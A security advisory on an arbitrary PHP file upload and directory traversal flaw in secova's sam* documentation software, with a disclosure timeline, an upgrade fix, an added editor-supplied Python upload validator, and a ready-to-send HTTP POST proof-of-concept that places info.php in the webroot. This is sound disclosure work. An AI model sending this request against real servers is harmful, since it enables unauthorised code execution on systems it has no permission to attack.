Advisory ID: SYSS-2016-002
Product: sam*
Vendor: secova
Affected Version(s): 5.8.2 and below
Tested Version(s): 5.7.11
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2016-01-08
Solution Date: 2016-04-18
Public Disclosure: 2016-05-24
CVE Reference: Not assigned
Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

It was discovered that the sam* application is susceptible to the upload
of PHP files, which can be used for arbitrary code execution.

The sam* application is described as follows [2]:

"sam* is an electronic documentation system and is used primarily in the
areas of health and safety, occupational safety, occupational health,
environmental protection, quality waste management and HR. (Keyword: EHS
Software) All essential operational requirements for companies are
ideally satisfied with sam*. sam* dovetails the most important main and
sub-disciplines (ISO, OHSAS, knowledge logistics and legal compliance)
with one another."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The application contains a gallery function which allows users to upload
images. However, this function can be used to upload arbitrary files to
arbitrary locations.
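As an added illustration of how an upload endpoint of the kind described above can be constrained (this is editor-supplied example code, not the vendor's fix and not code from sam*), the following Python handler ignores the client-supplied file name and Content-Type, derives the extension from the file content, and confines the user-controlled directory parameter to the gallery root. The accepted image signatures, the gallery root and all function names are assumptions.

```python
import os
import tempfile

# Leading bytes of the image types the gallery is meant to accept (assumption:
# PNG, JPEG and GIF; the advisory does not list the intended types).
IMAGE_SIGNATURES = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}


def detect_image_type(data: bytes):
    """Extension implied by the file content, or None. The client-supplied
    Content-Type header (image/png in the PoC) is never consulted."""
    for ext, magic in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def resolve_upload_target(gallery_root: str, requested_dir: str, data: bytes) -> str:
    """Absolute destination inside gallery_root, or ValueError.
    The file name is generated server-side, so a client name such as
    info.php never reaches the filesystem, and the user-controlled
    directory parameter is confined to the gallery tree."""
    ext = detect_image_type(data)
    if ext is None:
        raise ValueError("upload rejected: content is not a supported image")
    root = os.path.realpath(gallery_root)
    # Drop leading separators so "/../" is joined relative to root, canonicalise,
    # then verify the result is still root itself or a directory below it.
    target_dir = os.path.realpath(os.path.join(root, requested_dir.lstrip("/\\")))
    if os.path.commonpath([root, target_dir]) != root:
        raise ValueError("upload rejected: directory escapes the gallery root")
    return os.path.join(target_dir, f"{os.urandom(8).hex()}.{ext}")


def demo() -> dict:
    """Run the handler on constructed inputs modelled on the PoC request."""
    root = tempfile.mkdtemp()
    png = IMAGE_SIGNATURES["png"] + b"\x00" * 16  # constructed, not a real image
    php = b"<?php echo 1; ?>"                     # constructed stand-in for info.php
    cases = {"poc": ("/../", php), "traversal": ("/../", png), "ok": ("albums/2016", png)}
    results = {"root": os.path.realpath(root)}
    for label, (rdir, data) in cases.items():
        try:
            results[label] = resolve_upload_target(root, rdir, data)
        except ValueError as exc:
            results[label] = str(exc)
    return results
```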
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following POST request can be used to place an info.php file inside
the webroot:

POST /libs/sam/editor/gallery/dispatchGallery.php HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=
Content-Type: multipart/form-data; boundary=---------------------------568566108187924197632022778
Content-Length: 561

-----------------------------568566108187924197632022778
Content-Disposition: form-data; name="gUploadFile"; filename="info.php"
Content-Type: image/png

-----------------------------568566108187924197632022778
Content-Disposition: form-data; name="module"

uploadFile
-----------------------------568566108187924197632022778
Content-Disposition: form-data; name="directory"

/../
-----------------------------568566108187924197632022778--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to version 5.8.3 or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-12-22: Vulnerability discovered
2016-01-08: Vulnerability reported to vendor
2016-04-18: Release of a fixed version
2016-05-24: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-002
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-002.txt
[2] Vendor description of sam*
    https://www.secova.de/en/home/what-is-sam/
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Franz G. Jahn of the SySS GmbH.
E-Mail: franz.jahn (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc
Key ID: 0xD06A14DE
Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en